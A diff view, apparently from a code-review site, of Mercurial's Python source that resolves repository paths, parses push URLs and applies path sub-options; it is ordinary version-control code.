563 return self[k]
571 return self[k]
564 except KeyError:
572 except KeyError:
565 continue
573 continue
566 return None
574 return None
567
575
568 # Most likely empty string.
576 # Most likely empty string.
569 # This may need to raise in the future.
577 # This may need to raise in the future.
570 if not name:
578 if not name:
571 return None
579 return None
572
580
573 try:
581 try:
574 return self[name]
582 return self[name]
575 except KeyError:
583 except KeyError:
576 # Try to resolve as a local path or URI.
584 # Try to resolve as a local path or URI.
577 try:
585 try:
578 # we pass the ui instance are warning might need to be issued
586 # we pass the ui instance are warning might need to be issued
579 return path(ui, None, rawloc=name)
587 return path(ui, None, rawloc=name)
580 except ValueError:
588 except ValueError:
581 raise error.RepoError(_(b'repository %s does not exist') % name)
589 raise error.RepoError(_(b'repository %s does not exist') % name)
582
590
583
591
584 _pathsuboptions = {}
592 _pathsuboptions = {}
585
593
586
594
587 def pathsuboption(option, attr):
595 def pathsuboption(option, attr):
588 """Decorator used to declare a path sub-option.
596 """Decorator used to declare a path sub-option.
589
597
590 Arguments are the sub-option name and the attribute it should set on
598 Arguments are the sub-option name and the attribute it should set on
591 ``path`` instances.
599 ``path`` instances.
592
600
593 The decorated function will receive as arguments a ``ui`` instance,
601 The decorated function will receive as arguments a ``ui`` instance,
594 ``path`` instance, and the string value of this option from the config.
602 ``path`` instance, and the string value of this option from the config.
595 The function should return the value that will be set on the ``path``
603 The function should return the value that will be set on the ``path``
596 instance.
604 instance.
597
605
598 This decorator can be used to perform additional verification of
606 This decorator can be used to perform additional verification of
599 sub-options and to change the type of sub-options.
607 sub-options and to change the type of sub-options.
600 """
608 """
601
609
602 def register(func):
610 def register(func):
603 _pathsuboptions[option] = (attr, func)
611 _pathsuboptions[option] = (attr, func)
604 return func
612 return func
605
613
606 return register
614 return register
607
615
608
616
609 @pathsuboption(b'pushurl', b'pushloc')
617 @pathsuboption(b'pushurl', b'pushloc')
610 def pushurlpathoption(ui, path, value):
618 def pushurlpathoption(ui, path, value):
611 u = url(value)
619 u = url(value)
612 # Actually require a URL.
620 # Actually require a URL.
613 if not u.scheme:
621 if not u.scheme:
614 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
622 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
615 return None
623 return None
616
624
617 # Don't support the #foo syntax in the push URL to declare branch to
625 # Don't support the #foo syntax in the push URL to declare branch to
618 # push.
626 # push.
619 if u.fragment:
627 if u.fragment:
620 ui.warn(
628 ui.warn(
621 _(
629 _(
622 b'("#fragment" in paths.%s:pushurl not supported; '
630 b'("#fragment" in paths.%s:pushurl not supported; '
623 b'ignoring)\n'
631 b'ignoring)\n'
624 )
632 )
625 % path.name
633 % path.name
626 )
634 )
627 u.fragment = None
635 u.fragment = None
628
636
629 return bytes(u)
637 return bytes(u)
630
638
631
639
632 @pathsuboption(b'pushrev', b'pushrev')
640 @pathsuboption(b'pushrev', b'pushrev')
633 def pushrevpathoption(ui, path, value):
641 def pushrevpathoption(ui, path, value):
634 return value
642 return value
635
643
636
644
637 class path(object):
645 class path(object):
638 """Represents an individual path and its configuration."""
646 """Represents an individual path and its configuration."""
639
647
640 def __init__(self, ui, name, rawloc=None, suboptions=None):
648 def __init__(self, ui, name, rawloc=None, suboptions=None):
641 """Construct a path from its config options.
649 """Construct a path from its config options.
642
650
643 ``ui`` is the ``ui`` instance the path is coming from.
651 ``ui`` is the ``ui`` instance the path is coming from.
644 ``name`` is the symbolic name of the path.
652 ``name`` is the symbolic name of the path.
645 ``rawloc`` is the raw location, as defined in the config.
653 ``rawloc`` is the raw location, as defined in the config.
646 ``pushloc`` is the raw locations pushes should be made to.
654 ``pushloc`` is the raw locations pushes should be made to.
647
655
648 If ``name`` is not defined, we require that the location be a) a local
656 If ``name`` is not defined, we require that the location be a) a local
649 filesystem path with a .hg directory or b) a URL. If not,
657 filesystem path with a .hg directory or b) a URL. If not,
650 ``ValueError`` is raised.
658 ``ValueError`` is raised.
651 """
659 """
652 if not rawloc:
660 if not rawloc:
653 raise ValueError(b'rawloc must be defined')
661 raise ValueError(b'rawloc must be defined')
654
662
655 # Locations may define branches via syntax <base>#<branch>.
663 # Locations may define branches via syntax <base>#<branch>.
656 u = url(rawloc)
664 u = url(rawloc)
657 branch = None
665 branch = None
658 if u.fragment:
666 if u.fragment:
659 branch = u.fragment
667 branch = u.fragment
660 u.fragment = None
668 u.fragment = None
661
669
662 self.url = u
670 self.url = u
663 # the url from the config/command line before dealing with `path://`
671 # the url from the config/command line before dealing with `path://`
664 self.raw_url = u.copy()
672 self.raw_url = u.copy()
665 self.branch = branch
673 self.branch = branch
666
674
667 self.name = name
675 self.name = name
668 self.rawloc = rawloc
676 self.rawloc = rawloc
669 self.loc = b'%s' % u
677 self.loc = b'%s' % u
670
678
671 self._validate_path()
679 self._validate_path()
672
680
673 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
681 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
674 self._own_sub_opts = {}
682 self._own_sub_opts = {}
675 if suboptions is not None:
683 if suboptions is not None:
676 self._own_sub_opts = suboptions.copy()
684 self._own_sub_opts = suboptions.copy()
677 sub_opts.update(suboptions)
685 sub_opts.update(suboptions)
678 self._all_sub_opts = sub_opts.copy()
686 self._all_sub_opts = sub_opts.copy()
679
687
680 self._apply_suboptions(ui, sub_opts)
688 self._apply_suboptions(ui, sub_opts)
681
689
682 def chain_path(self, ui, paths):
690 def chain_path(self, ui, paths):
683 if self.url.scheme == b'path':
691 if self.url.scheme == b'path':
684 assert self.url.path is None
692 assert self.url.path is None
685 try:
693 try:
686 subpath = paths[self.url.host]
694 subpath = paths[self.url.host]
687 except KeyError:
695 except KeyError:
688 m = _(b'cannot use `%s`, "%s" is not a known path')
696 m = _(b'cannot use `%s`, "%s" is not a known path')
689 m %= (self.rawloc, self.url.host)
697 m %= (self.rawloc, self.url.host)
690 raise error.Abort(m)
698 raise error.Abort(m)
691 if subpath.raw_url.scheme == b'path':
699 if subpath.raw_url.scheme == b'path':
692 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
700 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
693 m %= (self.rawloc, self.url.host)
701 m %= (self.rawloc, self.url.host)
694 raise error.Abort(m)
702 raise error.Abort(m)
695 self.url = subpath.url
703 self.url = subpath.url
696 self.rawloc = subpath.rawloc
704 self.rawloc = subpath.rawloc
697 self.loc = subpath.loc
705 self.loc = subpath.loc
698 if self.branch is None:
706 if self.branch is None:
699 self.branch = subpath.branch
707 self.branch = subpath.branch
700 else:
708 else:
701 base = self.rawloc.rsplit(b'#', 1)[0]
709 base = self.rawloc.rsplit(b'#', 1)[0]
702 self.rawloc = b'%s#%s' % (base, self.branch)
710 self.rawloc = b'%s#%s' % (base, self.branch)
703 suboptions = subpath._all_sub_opts.copy()
711 suboptions = subpath._all_sub_opts.copy()
704 suboptions.update(self._own_sub_opts)
712 suboptions.update(self._own_sub_opts)
705 self._apply_suboptions(ui, suboptions)
713 self._apply_suboptions(ui, suboptions)
706
714
707 def _validate_path(self):
715 def _validate_path(self):
708 # When given a raw location but not a symbolic name, validate the
716 # When given a raw location but not a symbolic name, validate the
709 # location is valid.
717 # location is valid.
710 if (
718 if (
711 not self.name
719 not self.name
712 and not self.url.scheme
720 and not self.url.scheme
713 and not self._isvalidlocalpath(self.loc)
721 and not self._isvalidlocalpath(self.loc)
714 ):
722 ):
715 raise ValueError(
723 raise ValueError(
716 b'location is not a URL or path to a local '
724 b'location is not a URL or path to a local '
717 b'repo: %s' % self.rawloc
725 b'repo: %s' % self.rawloc
718 )
726 )
719
727
720 def _apply_suboptions(self, ui, sub_options):
728 def _apply_suboptions(self, ui, sub_options):
721 # Now process the sub-options. If a sub-option is registered, its
729 # Now process the sub-options. If a sub-option is registered, its
722 # attribute will always be present. The value will be None if there
730 # attribute will always be present. The value will be None if there
723 # was no valid sub-option.
731 # was no valid sub-option.
724 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
732 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
725 if suboption not in sub_options:
733 if suboption not in sub_options:
726 setattr(self, attr, None)
734 setattr(self, attr, None)
727 continue
735 continue
728
736
729 value = func(ui, self, sub_options[suboption])
737 value = func(ui, self, sub_options[suboption])
730 setattr(self, attr, value)
738 setattr(self, attr, value)
731
739
732 def _isvalidlocalpath(self, path):
740 def _isvalidlocalpath(self, path):
733 """Returns True if the given path is a potentially valid repository.
741 """Returns True if the given path is a potentially valid repository.
734 This is its own function so that extensions can change the definition of
742 This is its own function so that extensions can change the definition of
735 'valid' in this case (like when pulling from a git repo into a hg
743 'valid' in this case (like when pulling from a git repo into a hg
736 one)."""
744 one)."""
737 try:
745 try:
738 return os.path.isdir(os.path.join(path, b'.hg'))
746 return os.path.isdir(os.path.join(path, b'.hg'))
739 # Python 2 may return TypeError. Python 3, ValueError.
747 # Python 2 may return TypeError. Python 3, ValueError.
740 except (TypeError, ValueError):
748 except (TypeError, ValueError):
741 return False
749 return False
742
750
743 @property
751 @property
744 def suboptions(self):
752 def suboptions(self):
745 """Return sub-options and their values for this path.
753 """Return sub-options and their values for this path.
746
754
747 This is intended to be used for presentation purposes.
755 This is intended to be used for presentation purposes.
748 """
756 """
749 d = {}
757 d = {}
750 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
758 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
751 value = getattr(self, attr)
759 value = getattr(self, attr)
752 if value is not None:
760 if value is not None:
753 d[subopt] = value
761 d[subopt] = value
754 return d
762 return d
General Comments 0
You need to be logged in to leave comments. Login now